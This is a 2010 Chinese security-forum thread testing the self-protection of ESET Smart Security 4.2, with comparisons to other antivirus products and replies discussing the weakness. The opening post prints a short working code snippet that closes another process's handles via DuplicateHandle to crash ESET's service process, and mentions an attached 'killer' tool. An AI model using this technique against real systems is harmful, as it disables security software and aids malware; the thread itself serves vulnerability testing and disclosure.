查看: 4475|回复: 29
收起左侧

[原创] ESET Smart Security 4.2自我保护测试+killer

  [复制链接]
3x3eyes
头像被屏蔽
发表于 2010-5-27 20:13:17 | 显示全部楼层 |阅读模式
本帖最后由 3x3eyes 于 2010-5-27 20:17 编辑

惊闻ESET Smart Security加入了自我保护,测试之前发现做得还是比较不错的,至少已经远远超过了 空口吹大牛的号称 同类产品自保护最强 的金山2011全线产品,也超过了瑞星和江民(瑞星和江民两行最普通代码即可结束),以及小红伞(小红伞SPT FAIL一项)

目前NOD32过SPT全部项目,也过TESTRS\ENDTASK等基本测试工具

不过目前NOD32没有拦截驱动加载、KNOWNDLL、SYSDBGCTL等等,所以用内核态方法或者用猥琐注入还是可以轻易干掉NOD32的(这点上又比不上瑞星和江民了,但还是远远超过金山)


当然,如果是了解攻防的人来看,仅在非内核方式上,NOD32的自我防护 也还远称不上完美,这里我不需要用什么猥琐方法或者内核态方法,只需要3行代码,就可以让ESET轻易崩溃退出。


HANDLE hProc = OpenProcess(PROCESS_DUP_HANDLE , FALSE , pid);

for (ULONG i = 0 ; i < 0xffff; i += 4){DuplicateHandle(hProc , (HANDLE)i , 0 , 0 , 0 , 0 , DUPLICATE_CLOSE_SOURCE);}


附件中是测试工具,可以看到输入EKRN的PID后,该进程立即崩溃退出

注:对360安全卫士7.1正式版无效

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +5 人气 +1 收起 理由
gsl9583306 + 5 + 1 感谢提供分享

查看全部评分

dl123100
发表于 2010-5-27 20:17:36 | 显示全部楼层
本帖最后由 dl123100 于 2010-5-27 20:20 编辑

。。。。。
删除
3x3eyes
头像被屏蔽
 楼主| 发表于 2010-5-27 20:18:50 | 显示全部楼层
OpenProcess PROCESS_DUP_HANDLE这里确实不应该防,防了后进程会上不了网。

OpenProcess没做好的是瑞星和江民,Eset是duplicate没防好

评分

参与人数 1人气 +1 收起 理由
dl123100 + 1 谢谢回复

查看全部评分

IllusionWing
发表于 2010-5-27 20:21:07 | 显示全部楼层
DUP之后弄啊。。 不刺激。
3x3eyes
头像被屏蔽
 楼主| 发表于 2010-5-27 20:22:22 | 显示全部楼层
DUP之后弄啊。。 不刺激。
IllusionWing 发表于 2010-5-27 20:21



    没有之后,DUP之后已然挂了。
dl123100
发表于 2010-5-27 20:23:56 | 显示全部楼层
回复 3# 3x3eyes


        是我不行 谢谢回复指正
    想起了svchost有时会过来dup handle
IllusionWing
发表于 2010-5-27 20:25:26 | 显示全部楼层
回复 5# 3x3eyes


    不还是系统内部机理的问题么。。你程序是不干事情了,ESS在用HANDLE的时候就爆掉了,如果ESS不用系统句柄表那就有趣了。
3x3eyes
头像被屏蔽
 楼主| 发表于 2010-5-27 20:26:46 | 显示全部楼层
回复  3x3eyes


    不还是系统内部机理的问题么。。你程序是不干事情了,ESS在用HANDLE的时候就爆掉了 ...
IllusionWing 发表于 2010-5-27 20:25



    笑笑飘过。
chabosh
发表于 2010-5-27 21:00:00 | 显示全部楼层
貌似前几天微软说过一个什么表,很多杀软都可轻易干掉。貌似只有MSE不受哪个表的影响
3x3eyes
头像被屏蔽
 楼主| 发表于 2010-5-27 21:03:48 | 显示全部楼层
貌似前几天微软说过一个什么表,很多杀软都可轻易干掉。貌似只有MSE不受哪个表的影响
chabosh 发表于 2010-5-27 21:00



    那个是影响主防和自保的,MSE一没自保二没主防就是个摆设,当然不受影响,根本不需要受影响。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-21 16:35 , Processed in 0.158420 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表